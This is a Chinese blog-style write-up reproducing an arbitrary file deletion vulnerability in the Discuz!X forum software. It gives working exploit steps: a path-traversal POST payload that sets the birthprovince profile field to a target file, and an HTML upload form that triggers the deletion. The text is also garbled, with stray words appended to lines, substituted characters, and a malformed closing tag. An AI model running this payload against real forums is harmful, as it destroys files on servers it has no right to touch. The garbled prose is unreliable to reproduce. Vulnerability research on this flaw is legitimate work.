Discuz!X前台任意文件删除漏洞重现
漏洞背景:
Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其余多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。php
2017年9月29日,Discuz!修复了一个安全问题用于增强安全性,这个漏洞会致使前台用户能够致使任意删除文件漏洞。html
2017年9月29日,知道创宇404 实验室开始应急,通过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到 Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞,漏洞编号 ssvid-93588。该漏洞经过配置属性值,致使任意文件删除。数据库
通过分析确认,原有的利用方式已经被修复,添加了对属性的 formtype 判断,但修复方式不彻底致使能够绕过,经过模拟文件上传能够进入其余 unlink 条件,实现任意文件删除漏洞。安全
漏洞复现:
1.进入设置-我的资料,先在页面源代码找到formhash值,能够看到值为2599b5e5
2.开启一个插件Hackbar
Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5
执行后会显示一片空白,你再刷新下或从新访问下就行了。
3.出生地被修改为要删除的文件。
最后构造表单执行删除文件
<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>
生成.html,上面的须要本身修改。
4.而后随便上传一张图片,就能删除本身要删除的。
5.再访问回去看一下。
复现成功。ide